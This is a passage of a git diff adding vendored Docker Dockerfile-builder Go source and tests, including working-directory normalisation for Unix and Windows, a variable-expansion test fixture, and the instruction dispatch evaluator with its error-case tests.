+	b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true}
+
+	entrypointCmd := "/usr/sbin/nginx"
+
+	if err := entrypoint(b, []string{entrypointCmd}, nil, ""); err != nil {
+		t.Fatalf("Error should be empty, got: %s", err.Error())
+	}
+
+	if b.runConfig.Entrypoint == nil {
+		t.Fatalf("Entrypoint should be set")
+	}
+
+	var expectedEntrypoint strslice.StrSlice
+
+	if runtime.GOOS == "windows" {
+		expectedEntrypoint = strslice.StrSlice(append([]string{"cmd"}, "/S", "/C", entrypointCmd))
+	} else {
+		expectedEntrypoint = strslice.StrSlice(append([]string{"/bin/sh"}, "-c", entrypointCmd))
+	}
+
+	if !compareStrSlice(expectedEntrypoint, b.runConfig.Entrypoint) {
+		t.Fatalf("Entrypoint command should be set to %s, got %s", expectedEntrypoint, b.runConfig.Entrypoint)
+	}
+}
+
+func TestExpose(t *testing.T) {
+	b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true}
+
+	exposedPort := "80"
+
+	if err := expose(b, []string{exposedPort}, nil, ""); err != nil {
+		t.Fatalf("Error should be empty, got: %s", err.Error())
+	}
+
+	if b.runConfig.ExposedPorts == nil {
+		t.Fatalf("ExposedPorts should be set")
+	}
+
+	if len(b.runConfig.ExposedPorts) != 1 {
+		t.Fatalf("ExposedPorts should contain only 1 element. Got %s", b.runConfig.ExposedPorts)
+	}
+
+	portsMapping, err := nat.ParsePortSpec(exposedPort)
+
+	if err != nil {
+		t.Fatalf("Error when parsing port spec: %s", err.Error())
+	}
+
+	if _, ok := b.runConfig.ExposedPorts[portsMapping[0].Port]; !ok {
+		t.Fatalf("Port %s should be present. Got %s", exposedPort, b.runConfig.ExposedPorts)
+	}
+}
+
+func TestUser(t *testing.T) {
+	b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true}
+
+	userCommand := "foo"
+
+	if err := user(b, []string{userCommand}, nil, ""); err != nil {
+		t.Fatalf("Error should be empty, got: %s", err.Error())
+	}
+
+	if b.runConfig.User != userCommand {
+		t.Fatalf("User should be set to %s, got %s", userCommand, b.runConfig.User)
+	}
+}
+
+func TestVolume(t *testing.T) {
+	b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true}
+
+	exposedVolume := "/foo"
+
+	if err := volume(b, []string{exposedVolume}, nil, ""); err != nil {
+		t.Fatalf("Error should be empty, got: %s", err.Error())
+	}
+
+	if b.runConfig.Volumes == nil {
+		t.Fatalf("Volumes should be set")
+	}
+
+	if len(b.runConfig.Volumes) != 1 {
+		t.Fatalf("Volumes should contain only 1 element. Got %s", b.runConfig.Volumes)
+	}
+
+	if _, ok := b.runConfig.Volumes[exposedVolume]; !ok {
+		t.Fatalf("Volume %s should be present. Got %s", exposedVolume, b.runConfig.Volumes)
+	}
+}
+
+func TestStopSignal(t *testing.T) {
+	b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true}
+
+	signal := "SIGKILL"
+
+	if err := stopSignal(b, []string{signal}, nil, ""); err != nil {
+		t.Fatalf("Error should be empty, got: %s", err.Error())
+	}
+
+	if b.runConfig.StopSignal != signal {
+		t.Fatalf("StopSignal should be set to %s, got %s", signal, b.runConfig.StopSignal)
+	}
+}
+
+func TestArg(t *testing.T) {
+	buildOptions := &types.ImageBuildOptions{BuildArgs: make(map[string]*string)}
+
+	b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true, allowedBuildArgs: make(map[string]bool), options: buildOptions}
+
+	argName := "foo"
+	argVal := "bar"
+	argDef := fmt.Sprintf("%s=%s", argName, argVal)
+
+	if err := arg(b, []string{argDef}, nil, ""); err != nil {
+		t.Fatalf("Error should be empty, got: %s", err.Error())
+	}
+
+	allowed, ok := b.allowedBuildArgs[argName]
+
+	if !ok {
+		t.Fatalf("%s argument should be allowed as a build arg", argName)
+	}
+
+	if !allowed {
+		t.Fatalf("%s argument was present in map but disallowed as a build arg", argName)
+	}
+
+	val, ok := b.options.BuildArgs[argName]
+
+	if !ok {
+		t.Fatalf("%s argument should be a build arg", argName)
+	}
+
+	if *val != "bar" {
+		t.Fatalf("%s argument should have default value 'bar', got %s", argName, val)
+	}
+}
+
+func TestShell(t *testing.T) {
+	b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true}
+
+	shellCmd := "powershell"
+
+	attrs := make(map[string]bool)
+	attrs["json"] = true
+
+	if err := shell(b, []string{shellCmd}, attrs, ""); err != nil {
+		t.Fatalf("Error should be empty, got: %s", err.Error())
+	}
+
+	if b.runConfig.Shell == nil {
+		t.Fatalf("Shell should be set")
+	}
+
+	expectedShell := strslice.StrSlice([]string{shellCmd})
+
+	if !compareStrSlice(expectedShell, b.runConfig.Shell) {
+		t.Fatalf("Shell should be set to %s, got %s", expectedShell, b.runConfig.Shell)
+	}
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix.go
new file mode 100644
index 0000000000..8b0dfc3911
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix.go
@@ -0,0 +1,27 @@
+// +build !windows
+
+package dockerfile
+
+import (
+	"fmt"
+	"os"
+	"path/filepath"
+)
+
+// normaliseWorkdir normalises a user requested working directory in a
+// platform sematically consistent way.
+func normaliseWorkdir(current string, requested string) (string, error) {
+	if requested == "" {
+		return "", fmt.Errorf("cannot normalise nothing")
+	}
+	current = filepath.FromSlash(current)
+	requested = filepath.FromSlash(requested)
+	if !filepath.IsAbs(requested) {
+		return filepath.Join(string(os.PathSeparator), current, requested), nil
+	}
+	return requested, nil
+}
+
+func errNotJSON(command, _ string) error {
+	return fmt.Errorf("%s requires the arguments to be in JSON form", command)
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix_test.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix_test.go
new file mode 100644
index 0000000000..4aae6b460e
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix_test.go
@@ -0,0 +1,33 @@
+// +build !windows
+
+package dockerfile
+
+import (
+	"testing"
+)
+
+func TestNormaliseWorkdir(t *testing.T) {
+	testCases := []struct{ current, requested, expected, expectedError string }{
+		{``, ``, ``, `cannot normalise nothing`},
+		{``, `foo`, `/foo`, ``},
+		{``, `/foo`, `/foo`, ``},
+		{`/foo`, `bar`, `/foo/bar`, ``},
+		{`/foo`, `/bar`, `/bar`, ``},
+	}
+
+	for _, test := range testCases {
+		normalised, err := normaliseWorkdir(test.current, test.requested)
+
+		if test.expectedError != "" && err == nil {
+			t.Fatalf("NormaliseWorkdir should return an error %s, got nil", test.expectedError)
+		}
+
+		if test.expectedError != "" && err.Error() != test.expectedError {
+			t.Fatalf("NormaliseWorkdir returned wrong error. Expected %s, got %s", test.expectedError, err.Error())
+		}
+
+		if normalised != test.expected {
+			t.Fatalf("NormaliseWorkdir error. Expected %s for current %s and requested %s, got %s", test.expected, test.current, test.requested, normalised)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows.go
new file mode 100644
index 0000000000..e890c3ae18
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows.go
@@ -0,0 +1,86 @@
+package dockerfile
+
+import (
+	"fmt"
+	"os"
+	"path/filepath"
+	"regexp"
+	"strings"
+
+	"github.com/docker/docker/pkg/system"
+)
+
+var pattern = regexp.MustCompile(`^[a-zA-Z]:\.$`)
+
+// normaliseWorkdir normalises a user requested working directory in a
+// platform sematically consistent way.
+func normaliseWorkdir(current string, requested string) (string, error) {
+	if requested == "" {
+		return "", fmt.Errorf("cannot normalise nothing")
+	}
+
+	// `filepath.Clean` will replace "" with "." so skip in that case
+	if current != "" {
+		current = filepath.Clean(current)
+	}
+	if requested != "" {
+		requested = filepath.Clean(requested)
+	}
+
+	// If either current or requested in Windows is:
+	// C:
+	// C:.
+	// then an error will be thrown as the definition for the above
+	// refers to `current directory on drive C:`
+	// Since filepath.Clean() will automatically normalize the above
+	// to `C:.`, we only need to check the last format
+	if pattern.MatchString(current) {
+		return "", fmt.Errorf("%s is not a directory. If you are specifying a drive letter, please add a trailing '\\'", current)
+	}
+	if pattern.MatchString(requested) {
+		return "", fmt.Errorf("%s is not a directory. If you are specifying a drive letter, please add a trailing '\\'", requested)
+	}
+
+	// Target semantics is C:\somefolder, specifically in the format:
+	// UPPERCASEDriveLetter-Colon-Backslash-FolderName. We are already
+	// guaranteed that `current`, if set, is consistent. This allows us to
+	// cope correctly with any of the following in a Dockerfile:
+	//	WORKDIR a                       --> C:\a
+	//	WORKDIR c:\\foo                 --> C:\foo
+	//	WORKDIR \\foo                   --> C:\foo
+	//	WORKDIR /foo                    --> C:\foo
+	//	WORKDIR c:\\foo \ WORKDIR bar   --> C:\foo --> C:\foo\bar
+	//	WORKDIR C:/foo \ WORKDIR bar    --> C:\foo --> C:\foo\bar
+	//	WORKDIR C:/foo \ WORKDIR \\bar  --> C:\foo --> C:\bar
+	//	WORKDIR /foo \ WORKDIR c:/bar   --> C:\foo --> C:\bar
+	if len(current) == 0 || system.IsAbs(requested) {
+		if (requested[0] == os.PathSeparator) ||
+			(len(requested) > 1 && string(requested[1]) != ":") ||
+			(len(requested) == 1) {
+			requested = filepath.Join(`C:\`, requested)
+		}
+	} else {
+		requested = filepath.Join(current, requested)
+	}
+	// Upper-case drive letter
+	return (strings.ToUpper(string(requested[0])) + requested[1:]), nil
+}
+
+func errNotJSON(command, original string) error {
+	// For Windows users, give a hint if it looks like it might contain
+	// a path which hasn't been escaped such as ["c:\windows\system32\prog.exe", "-param"],
+	// as JSON must be escaped. Unfortunate...
+	//
+	// Specifically looking for quote-driveletter-colon-backslash, there's no
+	// double backslash and a [] pair. No, this is not perfect, but it doesn't
+	// have to be. It's simply a hint to make life a little easier.
+	extra := ""
+	original = filepath.FromSlash(strings.ToLower(strings.Replace(strings.ToLower(original), strings.ToLower(command)+" ", "", -1)))
+	if len(regexp.MustCompile(`"[a-z]:\\.*`).FindStringSubmatch(original)) > 0 &&
+		!strings.Contains(original, `\\`) &&
+		strings.Contains(original, "[") &&
+		strings.Contains(original, "]") {
+		extra = fmt.Sprintf(`. It looks like '%s' includes a file path without an escaped back-slash. JSON requires back-slashes to be escaped such as ["c:\\path\\to\\file.exe", "/parameter"]`, original)
+	}
+	return fmt.Errorf("%s requires the arguments to be in JSON form%s", command, extra)
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows_test.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows_test.go
new file mode 100644
index 0000000000..3319c06582
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows_test.go
@@ -0,0 +1,40 @@
+// +build windows
+
+package dockerfile
+
+import "testing"
+
+func TestNormaliseWorkdir(t *testing.T) {
+	tests := []struct{ current, requested, expected, etext string }{
+		{``, ``, ``, `cannot normalise nothing`},
+		{``, `C:`, ``, `C:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`},
+		{``, `C:.`, ``, `C:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`},
+		{`c:`, `\a`, ``, `c:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`},
+		{`c:.`, `\a`, ``, `c:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`},
+		{``, `a`, `C:\a`, ``},
+		{``, `c:\foo`, `C:\foo`, ``},
+		{``, `c:\\foo`, `C:\foo`, ``},
+		{``, `\foo`, `C:\foo`, ``},
+		{``, `\\foo`, `C:\foo`, ``},
+		{``, `/foo`, `C:\foo`, ``},
+		{``, `C:/foo`, `C:\foo`, ``},
+		{`C:\foo`, `bar`, `C:\foo\bar`, ``},
+		{`C:\foo`, `/bar`, `C:\bar`, ``},
+		{`C:\foo`, `\bar`, `C:\bar`, ``},
+	}
+	for _, i := range tests {
+		r, e := normaliseWorkdir(i.current, i.requested)
+
+		if i.etext != "" && e == nil {
+			t.Fatalf("TestNormaliseWorkingDir Expected error %s for '%s' '%s', got no error", i.etext, i.current, i.requested)
+		}
+
+		if i.etext != "" && e.Error() != i.etext {
+			t.Fatalf("TestNormaliseWorkingDir Expected error %s for '%s' '%s', got %s", i.etext, i.current, i.requested, e.Error())
+		}
+
+		if r != i.expected {
+			t.Fatalf("TestNormaliseWorkingDir Expected '%s' for '%s' '%s', got '%s'", i.expected, i.current, i.requested, r)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/envVarTest b/vendor/github.com/docker/docker/builder/dockerfile/envVarTest
new file mode 100644
index 0000000000..067dca9a54
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/envVarTest
@@ -0,0 +1,116 @@
+A|hello                    |     hello
+A|he'll'o                  |     hello
+A|he'llo                   |     hello
+A|he\'llo                  |     he'llo
+A|he\\'llo                 |     he\llo
+A|abc\tdef                 |     abctdef
+A|"abc\tdef"               |     abc\tdef
+A|'abc\tdef'               |     abc\tdef
+A|hello\                   |     hello
+A|hello\\                  |     hello\
+A|"hello                   |     hello
+A|"hello\"                 |     hello"
+A|"hel'lo"                 |     hel'lo
+A|'hello                   |     hello
+A|'hello\'                 |     hello\
+A|"''"                     |     ''
+A|$.                       |     $.
+A|$1                       |
+A|he$1x                    |     hex
+A|he$.x                    |     he$.x
+# Next one is different on Windows as $pwd==$PWD
+U|he$pwd.                  |     he.
+W|he$pwd.                  |     he/home.
+A|he$PWD                   |     he/home
+A|he\$PWD                  |     he$PWD
+A|he\\$PWD                 |     he\/home
+A|he\${}                   |     he${}
+A|he\${}xx                 |     he${}xx
+A|he${}                    |     he
+A|he${}xx                  |     hexx
+A|he${hi}                  |     he
+A|he${hi}xx                |     hexx
+A|he${PWD}                 |     he/home
+A|he${.}                   |     error
+A|he${XXX:-000}xx          |     he000xx
+A|he${PWD:-000}xx          |     he/homexx
+A|he${XXX:-$PWD}xx         |     he/homexx
+A|he${XXX:-${PWD:-yyy}}xx  |     he/homexx
+A|he${XXX:-${YYY:-yyy}}xx  |     heyyyxx
+A|he${XXX:YYY}             |     error
+A|he${XXX:+${PWD}}xx       |     hexx
+A|he${PWD:+${XXX}}xx       |     hexx
+A|he${PWD:+${SHELL}}xx     |     hebashxx
+A|he${XXX:+000}xx          |     hexx
+A|he${PWD:+000}xx          |     he000xx
+A|'he${XX}'                |     he${XX}
+A|"he${PWD}"               |     he/home
+A|"he'$PWD'"               |     he'/home'
+A|"$PWD"                   |     /home
+A|'$PWD'                   |     $PWD
+A|'\$PWD'                  |     \$PWD
+A|'"hello"'                |     "hello"
+A|he\$PWD                  |     he$PWD
+A|"he\$PWD"                |     he$PWD
+A|'he\$PWD'                |     he\$PWD
+A|he${PWD                  |     error
+A|he${PWD:=000}xx          |     error
+A|he${PWD:+${PWD}:}xx      |     he/home:xx
+A|he${XXX:-\$PWD:}xx       |     he$PWD:xx
+A|he${XXX:-\${PWD}z}xx     |     he${PWDz}xx
+A|안녕하세요                 |     안녕하세요
+A|안'녕'하세요               |     안녕하세요
+A|안'녕하세요                |     안녕하세요
+A|안녕\'하세요               |     안녕'하세요
+A|안\\'녕하세요              |     안\녕하세요
+A|안녕\t하세요               |     안녕t하세요
+A|"안녕\t하세요"             |     안녕\t하세요
+A|'안녕\t하세요              |     안녕\t하세요
+A|안녕하세요\                |     안녕하세요
+A|안녕하세요\\               |     안녕하세요\
+A|"안녕하세요                |     안녕하세요
+A|"안녕하세요\"              |     안녕하세요"
+A|"안녕'하세요"              |     안녕'하세요
+A|'안녕하세요                |     안녕하세요
+A|'안녕하세요\'              |     안녕하세요\
+A|안녕$1x                    |     안녕x
+A|안녕$.x                    |     안녕$.x
+# Next one is different on Windows as $pwd==$PWD
+U|안녕$pwd.                  |     안녕.
+W|안녕$pwd.                  |     안녕/home.
+A|안녕$PWD                   |     안녕/home
+A|안녕\$PWD                  |     안녕$PWD
+A|안녕\\$PWD                 |     안녕\/home
+A|안녕\${}                   |     안녕${}
+A|안녕\${}xx                 |     안녕${}xx
+A|안녕${}                    |     안녕
+A|안녕${}xx                  |     안녕xx
+A|안녕${hi}                  |     안녕
+A|안녕${hi}xx                |     안녕xx
+A|안녕${PWD}                 |     안녕/home
+A|안녕${.}                   |     error
+A|안녕${XXX:-000}xx          |     안녕000xx
+A|안녕${PWD:-000}xx          |     안녕/homexx
+A|안녕${XXX:-$PWD}xx         |     안녕/homexx
+A|안녕${XXX:-${PWD:-yyy}}xx  |     안녕/homexx
+A|안녕${XXX:-${YYY:-yyy}}xx  |     안녕yyyxx
+A|안녕${XXX:YYY}             |     error
+A|안녕${XXX:+${PWD}}xx       |     안녕xx
+A|안녕${PWD:+${XXX}}xx       |     안녕xx
+A|안녕${PWD:+${SHELL}}xx     |     안녕bashxx
+A|안녕${XXX:+000}xx          |     안녕xx
+A|안녕${PWD:+000}xx          |     안녕000xx
+A|'안녕${XX}'                |     안녕${XX}
+A|"안녕${PWD}"               |     안녕/home
+A|"안녕'$PWD'"               |     안녕'/home'
+A|'"안녕"'                   |     "안녕"
+A|안녕\$PWD                  |     안녕$PWD
+A|"안녕\$PWD"                |     안녕$PWD
+A|'안녕\$PWD'                |     안녕\$PWD
+A|안녕${PWD                  |     error
+A|안녕${PWD:=000}xx          |     error
+A|안녕${PWD:+${PWD}:}xx      |     안녕/home:xx
+A|안녕${XXX:-\$PWD:}xx       |     안녕$PWD:xx
+A|안녕${XXX:-\${PWD}z}xx     |     안녕${PWDz}xx
+A|$KOREAN                    |     한국어
+A|안녕$KOREAN                |     안녕한국어
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/evaluator.go b/vendor/github.com/docker/docker/builder/dockerfile/evaluator.go
new file mode 100644
index 0000000000..f5997c91a6
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/evaluator.go
@@ -0,0 +1,244 @@
+// Package dockerfile is the evaluation step in the Dockerfile parse/evaluate pipeline.
+//
+// It incorporates a dispatch table based on the parser.Node values (see the
+// parser package for more information) that are yielded from the parser itself.
+// Calling NewBuilder with the BuildOpts struct can be used to customize the
+// experience for execution purposes only. Parsing is controlled in the parser
+// package, and this division of responsibility should be respected.
+//
+// Please see the jump table targets for the actual invocations, most of which
+// will call out to the functions in internals.go to deal with their tasks.
+//
+// ONBUILD is a special case, which is covered in the onbuild() func in
+// dispatchers.go.
+//
+// The evaluator uses the concept of "steps", which are usually each processable
+// line in the Dockerfile. Each step is numbered and certain actions are taken
+// before and after each step, such as creating an image ID and removing temporary
+// containers and images. Note that ONBUILD creates a kinda-sorta "sub run" which
+// includes its own set of steps (usually only one of them).
+package dockerfile
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/docker/docker/builder/dockerfile/command"
+	"github.com/docker/docker/builder/dockerfile/parser"
+)
+
+// Environment variable interpolation will happen on these statements only.
+var replaceEnvAllowed = map[string]bool{
+	command.Env:        true,
+	command.Label:      true,
+	command.Add:        true,
+	command.Copy:       true,
+	command.Workdir:    true,
+	command.Expose:     true,
+	command.Volume:     true,
+	command.User:       true,
+	command.StopSignal: true,
+	command.Arg:        true,
+}
+
+// Certain commands are allowed to have their args split into more
+// words after env var replacements. Meaning:
+//   ENV foo="123 456"
+//   EXPOSE $foo
+// should result in the same thing as:
+//   EXPOSE 123 456
+// and not treat "123 456" as a single word.
+// Note that: EXPOSE "$foo" and EXPOSE $foo are not the same thing.
+// Quotes will cause it to still be treated as single word.
+var allowWordExpansion = map[string]bool{
+	command.Expose: true,
+}
+
+var evaluateTable map[string]func(*Builder, []string, map[string]bool, string) error
+
+func init() {
+	evaluateTable = map[string]func(*Builder, []string, map[string]bool, string) error{
+		command.Add:         add,
+		command.Arg:         arg,
+		command.Cmd:         cmd,
+		command.Copy:        dispatchCopy, // copy() is a go builtin
+		command.Entrypoint:  entrypoint,
+		command.Env:         env,
+		command.Expose:      expose,
+		command.From:        from,
+		command.Healthcheck: healthcheck,
+		command.Label:       label,
+		command.Maintainer:  maintainer,
+		command.Onbuild:     onbuild,
+		command.Run:         run,
+		command.Shell:       shell,
+		command.StopSignal:  stopSignal,
+		command.User:        user,
+		command.Volume:      volume,
+		command.Workdir:     workdir,
+	}
+}
+
+// This method is the entrypoint to all statement handling routines.
+//
+// Almost all nodes will have this structure:
+// Child[Node, Node, Node] where Child is from parser.Node.Children and each
+// node comes from parser.Node.Next. This forms a "line" with a statement and
+// arguments and we process them in this normalized form by hitting
+// evaluateTable with the leaf nodes of the command and the Builder object.
+//
+// ONBUILD is a special case; in this case the parser will emit:
+// Child[Node, Child[Node, Node...]] where the first node is the literal
+// "onbuild" and the child entrypoint is the command of the ONBUILD statement,
+// such as `RUN` in ONBUILD RUN foo. There is special case logic in here to
+// deal with that, at least until it becomes more of a general concern with new
+// features.
+func (b *Builder) dispatch(stepN int, stepTotal int, ast *parser.Node) error {
+	cmd := ast.Value
+	upperCasedCmd := strings.ToUpper(cmd)
+
+	// To ensure the user is given a decent error message if the platform
+	// on which the daemon is running does not support a builder command.
+	if err := platformSupports(strings.ToLower(cmd)); err != nil {
+		return err
+	}
+
+	attrs := ast.Attributes
+	original := ast.Original
+	flags := ast.Flags
+	strList := []string{}
+	msg := fmt.Sprintf("Step %d/%d : %s", stepN+1, stepTotal, upperCasedCmd)
+
+	if len(ast.Flags) > 0 {
+		msg += " " + strings.Join(ast.Flags, " ")
+	}
+
+	if cmd == "onbuild" {
+		if ast.Next == nil {
+			return fmt.Errorf("ONBUILD requires at least one argument")
+		}
+		ast = ast.Next.Children[0]
+		strList = append(strList, ast.Value)
+		msg += " " + ast.Value
+
+		if len(ast.Flags) > 0 {
+			msg += " " + strings.Join(ast.Flags, " ")
+		}
+
+	}
+
+	// count the number of nodes that we are going to traverse first
+	// so we can pre-create the argument and message array. This speeds up the
+	// allocation of those list a lot when they have a lot of arguments
+	cursor := ast
+	var n int
+	for cursor.Next != nil {
+		cursor = cursor.Next
+		n++
+	}
+	msgList := make([]string, n)
+
+	var i int
+	// Append the build-time args to config-environment.
+	// This allows builder config to override the variables, making the behavior similar to
+	// a shell script i.e. `ENV foo bar` overrides value of `foo` passed in build
+	// context. But `ENV foo $foo` will use the value from build context if one
+	// isn't already been defined by a previous ENV primitive.
+	// Note, we get this behavior because we know that ProcessWord() will
+	// stop on the first occurrence of a variable name and not notice
+	// a subsequent one. So, putting the buildArgs list after the Config.Env
+	// list, in 'envs', is safe.
+	envs := b.runConfig.Env
+	for key, val := range b.options.BuildArgs {
+		if !b.isBuildArgAllowed(key) {
+			// skip build-args that are not in allowed list, meaning they have
+			// not been defined by an "ARG" Dockerfile command yet.
+			// This is an error condition but only if there is no "ARG" in the entire
+			// Dockerfile, so we'll generate any necessary errors after we parsed
+			// the entire file (see 'leftoverArgs' processing in evaluator.go )
+			continue
+		}
+		envs = append(envs, fmt.Sprintf("%s=%s", key, *val))
+	}
+	for ast.Next != nil {
+		ast = ast.Next
+		var str string
+		str = ast.Value
+		if replaceEnvAllowed[cmd] {
+			var err error
+			var words []string
+
+			if allowWordExpansion[cmd] {
+				words, err = ProcessWords(str, envs, b.directive.EscapeToken)
+				if err != nil {
+					return err
+				}
+				strList = append(strList, words...)
+			} else {
+				str, err = ProcessWord(str, envs, b.directive.EscapeToken)
+				if err != nil {
+					return err
+				}
+				strList = append(strList, str)
+			}
+		} else {
+			strList = append(strList, str)
+		}
+		msgList[i] = ast.Value
+		i++
+	}
+
+	msg += " " + strings.Join(msgList, " ")
+	fmt.Fprintln(b.Stdout, msg)
+
+	// XXX yes, we skip any cmds that are not valid; the parser should have
+	// picked these out already.
+	if f, ok := evaluateTable[cmd]; ok {
+		b.flags = NewBFlags()
+		b.flags.Args = flags
+		return f(b, strList, attrs, original)
+	}
+
+	return fmt.Errorf("Unknown instruction: %s", upperCasedCmd)
+}
+
+// checkDispatch does a simple check for syntax errors of the Dockerfile.
+// Because some of the instructions can only be validated through runtime,
+// arg, env, etc., this syntax check will not be complete and could not replace
+// the runtime check. Instead, this function is only a helper that allows
+// user to find out the obvious error in Dockerfile earlier on.
+// onbuild bool: indicate if instruction XXX is part of `ONBUILD XXX` trigger
+func (b *Builder) checkDispatch(ast *parser.Node, onbuild bool) error {
+	cmd := ast.Value
+	upperCasedCmd := strings.ToUpper(cmd)
+
+	// To ensure the user is given a decent error message if the platform
+	// on which the daemon is running does not support a builder command.
+	if err := platformSupports(strings.ToLower(cmd)); err != nil {
+		return err
+	}
+
+	// The instruction itself is ONBUILD, we will make sure it follows with at
+	// least one argument
+	if upperCasedCmd == "ONBUILD" {
+		if ast.Next == nil {
+			return fmt.Errorf("ONBUILD requires at least one argument")
+		}
+	}
+
+	// The instruction is part of ONBUILD trigger (not the instruction itself)
+	if onbuild {
+		switch upperCasedCmd {
+		case "ONBUILD":
+			return fmt.Errorf("Chaining ONBUILD via `ONBUILD ONBUILD` isn't allowed")
+		case "MAINTAINER", "FROM":
+			return fmt.Errorf("%s isn't allowed as an ONBUILD trigger", upperCasedCmd)
+		}
+	}
+
+	if _, ok := evaluateTable[cmd]; ok {
+		return nil
+	}
+
+	return fmt.Errorf("Unknown instruction: %s", upperCasedCmd)
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/evaluator_test.go b/vendor/github.com/docker/docker/builder/dockerfile/evaluator_test.go
new file mode 100644
index 0000000000..4340a2f8ac
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/evaluator_test.go
@@ -0,0 +1,197 @@
+package dockerfile
+
+import (
+	"io/ioutil"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/builder"
+	"github.com/docker/docker/builder/dockerfile/parser"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/reexec"
+)
+
+type dispatchTestCase struct {
+	name, dockerfile, expectedError string
+	files                           map[string]string
+}
+
+func init() {
+	reexec.Init()
+}
+
+func initDispatchTestCases() []dispatchTestCase {
+	dispatchTestCases := []dispatchTestCase{{
+		name: "copyEmptyWhitespace",
+		dockerfile: `COPY
+	quux \
+      bar`,
+		expectedError: "COPY requires at least two arguments",
+	},
+		{
+			name:          "ONBUILD forbidden FROM",
+			dockerfile:    "ONBUILD FROM scratch",
+			expectedError: "FROM isn't allowed as an ONBUILD trigger",
+			files:         nil,
+		},
+		{
+			name:          "ONBUILD forbidden MAINTAINER",
+			dockerfile:    "ONBUILD MAINTAINER docker.io",
+			expectedError: "MAINTAINER isn't allowed as an ONBUILD trigger",
+			files:         nil,
+		},
+		{
+			name:          "ARG two arguments",
+			dockerfile:    "ARG foo bar",
+			expectedError: "ARG requires exactly one argument",
+			files:         nil,
+		},
+		{
+			name:          "MAINTAINER unknown flag",
+			dockerfile:    "MAINTAINER --boo joe@example.com",
+			expectedError: "Unknown flag: boo",
+			files:         nil,
+		},
+		{
+			name:          "ADD multiple files to file",
+			dockerfile:    "ADD file1.txt file2.txt test",
+			expectedError: "When using ADD with more than one source file, the destination must be a directory and end with a /",
+			files:         map[string]string{"file1.txt": "test1", "file2.txt": "test2"},
+		},
+		{
+			name:          "JSON ADD multiple files to file",
+			dockerfile:    `ADD ["file1.txt", "file2.txt", "test"]`,
+			expectedError: "When using ADD with more than one source file, the destination must be a directory and end with a /",
+			files:         map[string]string{"file1.txt": "test1", "file2.txt": "test2"},
+		},
+		{
+			name:          "Wildcard ADD multiple files to file",
+			dockerfile:    "ADD file*.txt test",
+			expectedError: "When using ADD with more than one source file, the destination must be a directory and end with a /",
+			files:         map[string]string{"file1.txt": "test1", "file2.txt": "test2"},
+		},
+		{
+			name:          "Wildcard JSON ADD multiple files to file",
+			dockerfile:    `ADD ["file*.txt", "test"]`,
+			expectedError: "When using ADD with more than one source file, the destination must be a directory and end with a /",
+			files:         map[string]string{"file1.txt": "test1", "file2.txt": "test2"},
+		},
+		{
+			name:          "COPY multiple files to file",
+			dockerfile:    "COPY file1.txt file2.txt test",
+			expectedError: "When using COPY with more than one source file, the destination must be a directory and end with a /",
+			files:         map[string]string{"file1.txt": "test1", "file2.txt": "test2"},
+		},
+		{
+			name:          "JSON COPY multiple files to file",
+			dockerfile:    `COPY ["file1.txt", "file2.txt", "test"]`,
+			expectedError: "When using COPY with more than one source file, the destination must be a directory and end with a /",
+			files:         map[string]string{"file1.txt": "test1", "file2.txt": "test2"},
+		},
+		{
+			name:          "ADD multiple files to file with whitespace",
+			dockerfile:    `ADD [ "test file1.txt", "test file2.txt", "test" ]`,
+			expectedError: "When using ADD with more than one source file, the destination must be a directory and end with a /",
+			files:         map[string]string{"test file1.txt": "test1", "test file2.txt": "test2"},
+		},
+		{
+			name:          "COPY multiple files to file with whitespace",
+			dockerfile:    `COPY [ "test file1.txt", "test file2.txt", "test" ]`,
+			expectedError: "When using COPY with more than one source file, the destination must be a directory and end with a /",
+			files:         map[string]string{"test file1.txt": "test1", "test file2.txt": "test2"},
+		},
+		{
+			name:          "COPY wildcard no files",
+			dockerfile:    `COPY file*.txt /tmp/`,
+			expectedError: "No source files were specified",
+			files:         nil,
+		},
+		{
+			name:          "COPY url",
+			dockerfile:    `COPY https://index.docker.io/robots.txt /`,
+			expectedError: "Source can't be a URL for COPY",
+			files:         nil,
+		},
+		{
+			name:          "Chaining ONBUILD",
+			dockerfile:    `ONBUILD ONBUILD RUN touch foobar`,
+			expectedError: "Chaining ONBUILD via `ONBUILD ONBUILD` isn't allowed",
+			files:         nil,
+		},
+		{
+			name:          "Invalid instruction",
+			dockerfile:    `foo bar`,
+			expectedError: "Unknown instruction: FOO",
+			files:         nil,
